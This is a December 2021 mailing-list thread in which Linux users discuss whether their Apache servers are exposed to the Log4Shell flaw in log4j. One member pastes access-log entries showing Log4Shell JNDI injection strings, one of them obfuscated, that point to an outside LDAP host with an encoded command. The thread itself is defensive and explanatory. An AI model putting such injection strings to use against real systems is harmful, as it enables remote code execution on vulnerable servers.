This might be able to find out if your system has any traces of log4j installed: sudo find / -name '*log4j*' -print If that doesn't output anything, you are most likely safe. ________________________________ From: Chris Thompson via WLUG <wlug@lists.wlug.org> Sent: Wednesday, December 15, 2021 3:40 PM To: wlug@lists.wlug.org <wlug@lists.wlug.org> Cc: Chris Thompson <wolcen@riseup.net> Subject: [WLUG] Re: Bug in the news httpd does not use log4j. solr, on the other hand, normally does. ...and Minecraft, if that applies to your server :P ~Chris On 12/15/21 15:26, Keith Wright via WLUG wrote:
Michael Voorhis <mvoorhis@mcvau.net> writes:
Log4j is a Java logging library. If you're running apache and not using Java, I don't think you need to be concerned.
See here...
https://en.wikipedia.org/wiki/Log4Shell Interesting link, thanks for that.
I don't use Java, but is Apache using it without my knowledge?
NB: I am a bear of little brain. -- Pooh I can't. I don't know how it works! -- OZ
I find in /var/log/httpd/access_log
95.54.160.149 - - [15/Dec/2021:12:59:07 -0500] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1c ... ... "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}: //195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgL ... ...
So they are trying. How can tell if they succeeded?
I have "gij" installed (by distro). I didn't know that two hours ago.
What would break if I just deleted that?
-- Keith